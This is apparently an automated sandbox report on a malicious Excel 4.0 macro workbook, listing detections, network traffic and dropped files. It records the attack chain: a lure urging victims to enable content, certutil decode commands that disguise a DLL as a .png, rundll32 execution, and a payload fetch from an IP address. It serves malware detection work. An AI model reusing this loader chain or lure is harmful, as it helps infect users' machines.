Analysis Report Presentation_812525.xlsb

Overview

General Information

Sample Name: Presentation_812525.xlsb
Analysis ID: 342076
MD5: 4ddace9347c434a749eab40a211e6628
SHA1: c46b2b46bd274ad37bb5dbcea12bc8278f3b361e
SHA256: 796d5317aae9d27707694f5e2832fe990d1a7890ac53ec339b8f1233fe05a3a7

Detection

Hidden Macro 4.0
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Certutil Command
Uses certutil -decode
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\Public\94101.png ReversingLabs: Detection: 35%

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.3:49709 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\certutil.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: yahoo.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49708 -> 74.6.143.26:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49707 -> 172.104.129.156:80

Networking:

IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.248.100.215
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LINODE-APLinodeLLCUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /campo/o/o HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 172.104.129.156
Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 172.104.129.156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001000 EntryPoint,GetProcAddress,GetProcAddress,CreateDirectoryA,URLDownloadToFileA, 6_2_10001000
Source: unknown DNS traffic detected: queries for: yahoo.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://overview.mail.yahoo.com/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/cmp/version/3.0.3/cmp.js
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/react-wafer-subscription.SubscriptionReminder.atomic.ltr.cf0f4577b866e
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/react-wafer-subscription.custom.desktop.95c72e8740c6b97fbdb525937d8788
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-footer.FooterDesktop.atomic.ltr.0dabe32d96d30f44862f1509e65
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.HeaderDesktop.atomic.ltr.11873c103003ff0d3521375fdb9
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.MailPreview.atomic.ltr.1d101919d0fcd67e4832e47629894
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-header.custom.desktop.2ce65662738d6cd781c23fc340c7205c.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-hpsetpromo.HpSetBannerPromo.atomic.ltr.b7b5b76bb9c6987dd5d6
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-hpsetpromo.HpSetPromo.atomic.ltr.f9b4b86f21ef1f516530b45567
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-ntk.NTKDesktop.atomic.ltr.94b956089fc91c2f0a244928a927abc9.
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-ntk.custom.desktop.a69916e03ec8f658d9530295bab867ab.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.StreamRelated.atomic.ltr.ce56954bd34343adfacf42baec3
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.StreamWide.atomic.ltr.01431f1a963747bd42b012a4d15cd6
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-stream.custom.desktop.35b4e59342f8c72801c502afb5933cff.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-trending.Trending.atomic.ltr.3daf50b9757f01b0beab6adecd0b22
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-dialog.UserDialogLite.atomic.ltr.875d949b676096085b14b
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-intent.ContentPreference.atomic.ltr.bbf364e334d48eef59
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/css/tdv2-wafer-user-intent.rollupDesktop.atomic.ltr.85ffd965befa53ddf87e9a
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/js/tdv2-wafer-header.custom.desktop.e0cc81c4de21a0aee644ee9285d79117.js
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/fp/js/tdv2-wafer-stream.custom.09abbb0c62340e97edf4c917b11628c4.js
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/scp/css/viewer.620320aff0540f575958990a24cd94ed.css
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/vzm/cs_1.1.3.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/vzm/perf-vitals_1.3.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-account-switch-1.1.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-autocomplete-1.19.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-beacon-1.3.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-bind-1.1.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-clipboard-copy-1.0.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-core-1.43.10.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-countdown-1.2.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-darla-1.0.21.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-drawer-1.0.10.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-dropdown-drawer-1.0.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-fetch-1.16.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-form-1.23.1.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-geolocation-1.2.9.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-image-1.1.5.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-menu-1.0.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-rapid-1.5.0.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-tabs-1.10.2.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-text-1.1.3.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-toggle-1.13.2.js
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/aaq/yc/js/iframe-1.0.26.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/cv/apiv2/default/20191018/EN_US_Yellow_300x250.png)
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/cv/apiv2/default/icons/favicon_y19_32x32_custom.svg
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/cv/apiv2/notifications/default-notif-img.png-168x168.png
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/cv/apiv2/social/images/yahoo_default_logo.png
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/nn/lib/metro/DailyFantasy_BN_Baseball_300x250-min.jpg)
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/nn/lib/metro/g/myy/fallback_grid_0.0.4.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/nn/lib/metro/g/sda/sda_flex_0.0.42.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/os/yc/css/bundle.c60a6d54.css
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/rq/darla/4-6-0/js/g-r-min.js
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/rz/l/favicon.ico
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/ss/rapid-3.53.17.js
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/BUky.irBpy2idMZJp.EufA--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/Emg04hx6q7x_kZo7E5_wgA--~B/Zmk9c3RyaW07aD0xOTM7cT05NTt3PTIyMDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/GXmFDhVbGWyZvB.4VbCU7w--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/NJBDKYvT49dzIAW1aj4NFA--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/QotT_5MVAG9nDKsSCE8gVA--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/QzM21sk4Ljo_mk7ni0FtpQ--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/UFLqS.xvyj1podCMDQzrLA--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/avZ1m08tUBiHPBtv_CLfAw--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/l_eSHW.xbgQKdH8J9CAEbg--~B/Zmk9c3RyaW07aD0zODg7cT05NTt3PTcyMDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/osujQR2mchEHVk2pUiF4hQ--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: rundll32.exe, 00000006.00000002.250797242.0000000004B00000.00000004.00000001.sdmp String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/ukebcHBGNd6YYmQqOpTWGQ--~B/Zmk9c3RyaW07aD0xOTg7cT04MDt3PTM4MDthcHB
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/wYmB0OdYXJ_idrKq3V9SYw--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c7=https%3A%2F%2Fwww.yahoo.com%2F&c5=2023538075&c
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://search.yahoo.com/opensearch.xml
Source: 94101.png.4.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://settings.outlook.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://tasks.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 14A1215A-380B-45DE-AA00-CCD0BB357790.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/advertising
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/careers
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/adinfo/index.html&quot;
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/privacy/index.html
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.verizonmedia.com/policies/us/en/verizonmedia/terms/otos/index.html
Source: 9J0CLPJO.htm.6.dr String found in binary or memory: https://www.yahoo.com/
Source: rundll32.exe, 00000006.00000003.248331177.0000000004B01000.00000004.00000001.sdmp, 9J0CLPJO.htm.6.dr String found in binary or memory: https://yahoo.uservoice.com/forums/341361-yahoo-home?browser=ie&amp;bucket=FPTRELUG105&amp;os=window
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.3:49709 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)
Source: C:\Users\Public\94101.png2, type: DROPPED Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: Enable editing" from the yellow bar 13 above. 14 15_ Once you have enabled editing, please click
Source: Screenshot number: 8 Screenshot OCR: Enable content' ontheyellow barabo:: 20" , a *this document is completely safety to open 21 22 2
Found Excel 4.0 Macro with suspicious formulas
Source: Presentation_812525.xlsb Initial sample: CALL
Yara signature match
Source: C:\Users\Public\94101.png2, type: DROPPED Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: classification engine Classification label: mal96.expl.evad.winXLSB@11/14@2/4
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{60490B27-0950-42C5-96BE-3819E3A7C960} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\certutil.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\ProgramData\ioq\ioq.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\Public\94101.png,In
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\ProgramData\ioq\ioq.dll,DllRegisterServer
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Presentation_812525.xlsb Initial sample: OLE zip file path = xl/media/image1.png
Source: Presentation_812525.xlsb Initial sample: OLE zip file path = docProps/thumbnail.wmf
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001C26 push ecx; ret 6_2_10001C39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009032D0 push edx; ret 6_2_009033D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00903270 push edx; ret 6_2_0090327B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009007B8 push eax; ret 6_2_009007C2

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\SysWOW64\certutil.exe File created: C:\Users\Public\94101.png
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\certutil.exe File created: C:\Users\Public\94101.png
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\certutil.exe File created: C:\Users\Public\94101.png

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\certutil.exe File created: C:\Users\Public\94101.png

